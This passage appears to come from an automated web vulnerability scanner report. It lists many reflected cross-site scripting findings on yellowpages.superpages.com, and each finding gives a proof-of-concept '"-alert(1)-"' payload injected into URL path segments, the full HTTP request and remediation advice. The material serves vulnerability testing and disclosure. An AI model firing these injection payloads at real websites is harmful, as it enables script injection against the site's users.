Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff3b0"-alert(1)-"0f9464b5bb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/print.cssff3b0"-alert(1)-"0f9464b5bb7 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49cd4"-alert(1)-"96eceb6ffe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile49cd4"-alert(1)-"96eceb6ffe4/js/busprofile.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b019f"-alert(1)-"5e23dbe0df5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsb019f"-alert(1)-"5e23dbe0df5/busprofile.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af28c"-alert(1)-"d5cdefab79b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/busprofile.jsaf28c"-alert(1)-"d5cdefab79b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edb86"-alert(1)-"af2b6080645 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofileedb86"-alert(1)-"af2b6080645/js/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bae2"-alert(1)-"d1c4fd37467 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js1bae2"-alert(1)-"d1c4fd37467/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd87"-alert(1)-"26871eafe34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/csiframe.js1dd87"-alert(1)-"26871eafe34 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c75"-alert(1)-"933c529b5ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofileb3c75"-alert(1)-"933c529b5ba/js/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de57b"-alert(1)-"653154b748 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsde57b"-alert(1)-"653154b748/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f72"-alert(1)-"1d6df26e138 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/hide.js30f72"-alert(1)-"1d6df26e138 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f5f"-alert(1)-"a4339366c19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile41f5f"-alert(1)-"a4339366c19/js/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bda1"-alert(1)-"1e48a19052d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js9bda1"-alert(1)-"1e48a19052d/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92aa7"-alert(1)-"ad045aaf68e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/photos.js92aa7"-alert(1)-"ad045aaf68e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50c0b"-alert(1)-"1189d0fb19e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile50c0b"-alert(1)-"1189d0fb19e/script.more.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 696df"-alert(1)-"ae58cd1d73c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/script.more.js696df"-alert(1)-"ae58cd1d73c HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e37"-alert(1)-"a77217be230 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common27e37"-alert(1)-"a77217be230/css/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7342"-alert(1)-"107199becab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssf7342"-alert(1)-"107199becab/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1c09"-alert(1)-"6f31add0046 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/forms.cssf1c09"-alert(1)-"6f31add0046 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdca"-alert(1)-"96068b15aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common3fdca"-alert(1)-"96068b15aaf/css/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef7bf"-alert(1)-"eed6ae6e6f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssef7bf"-alert(1)-"eed6ae6e6f1/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a006a"-alert(1)-"cbff4859ae5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/print.cssa006a"-alert(1)-"cbff4859ae5 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1ff"-alert(1)-"dc2efa902dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonda1ff"-alert(1)-"dc2efa902dc/css/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95a34"-alert(1)-"686e302e816 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css95a34"-alert(1)-"686e302e816/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aabb"-alert(1)-"23c3bf4d12 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/reset.css3aabb"-alert(1)-"23c3bf4d12 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15d"-alert(1)-"4cb99c62a1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonad15d"-alert(1)-"4cb99c62a1b/css/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c75f4"-alert(1)-"02b021d68ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
